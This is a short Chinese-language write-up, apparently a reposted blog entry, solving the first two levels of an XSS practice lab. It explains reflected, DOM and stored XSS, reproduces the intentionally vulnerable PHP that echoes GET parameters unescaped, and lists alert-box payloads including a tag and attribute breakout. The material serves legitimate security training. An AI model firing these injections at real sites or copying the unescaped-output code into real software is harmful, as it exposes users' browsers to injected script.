XSS跨站攻擊靶場-通關筆記


XSS攻擊是Web攻擊中最常見的攻擊手法之一,XSS中文名跨站腳本攻擊,該攻擊是指攻擊者在網頁中嵌入惡意的客戶端腳本,通常是使用JS編寫的惡意代碼,當正常用戶訪問被嵌入代碼的頁面時,惡意代碼將會在用戶的瀏覽器上執行,所以XSS攻擊主要時針對客戶端的攻擊手法。

當下常見的 XSS 攻擊有三種:反射型、DOM型、存儲型。 其中反射型、DOM型可以歸類為非持久型 XSS 攻擊,存儲型歸類為持久型 XSS 攻擊。

練習環境:https://github.com/lyshark/xss-labs.git

第一關

<?php 
ini_set("display_errors", 0);
$str = $_GET["name"];
echo "<h2 align=center>歡迎用戶".$str."</h2>";
?>

payload : lyshark.com/level1.php?name= <script>alert('hello');</script>

第二關

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "<h2 align=center>沒有找到和".htmlspecialchars($str)."相關的結果.</h2>".'<center>
<form action=level2.php method=GET>
<input name=keyword  value="'.$str.'">
<input type=submit name=submit value="搜索"/>
</form>
</center>';
?>

首先確定輸入后的內容,在哪里顯示出來了。

發現能夠閉合

|"><script>alert('xss');</script>| <input name=keyword value=""><script>alert('xss');</script>">|
|"onclick="window.alert() | <input name=keyword value=""onclick="window.alert()">|


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM